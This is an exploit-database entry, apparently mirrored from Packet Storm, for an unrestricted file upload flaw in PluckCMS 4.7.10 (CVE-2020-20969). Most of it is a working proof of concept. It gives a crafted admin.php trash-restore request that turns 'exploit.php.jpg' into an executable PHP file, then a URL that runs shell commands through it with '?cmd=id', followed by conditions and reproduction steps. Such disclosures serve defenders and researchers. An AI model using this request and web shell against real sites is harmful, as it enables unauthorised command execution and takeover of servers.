Share
## https://sploitus.com/exploit?id=PACKETSTORM:212393
# Exploit Title: PluckCMS 4.7.10 - Unrestricted File Upload
    # Date: 2025-11-25
    # Exploit Author: CodeSecLab
    # Vendor Homepage: https://github.com/pluck-cms/pluck/
    # Software Link: https://github.com/pluck-cms/pluck/
    # Version: 4.7.10 
    # Tested on: Windows
    # CVE : CVE-2020-20969
    
    
    Proof Of Concept
    GET /admin.php?action=trash_restoreitem&var1=exploit.php.jpg&var2=file HTTP/1.1
    Host: pluck
    Cookie: PHPSESSID=[valid_session_id]
    
    **Access Method:**  
    http://pluck/files/exploit_copy.php?cmd=id
    
    **Additional Conditions:**  
    1. Valid session cookie required (authenticated attack)
    2. File `exploit.php.jpg` must exist in `data/trash/files/` before restoration
    3. Server must not filter double extensions during file upload/trash operations
    
    
    Steps to Reproduce
    Log in as an admin user.
    Intercept and send the malicious request using a web proxy tool such as Burp Suite, ensure it includes a valid session cookie.
    The file will be restored and can be accessed through the url.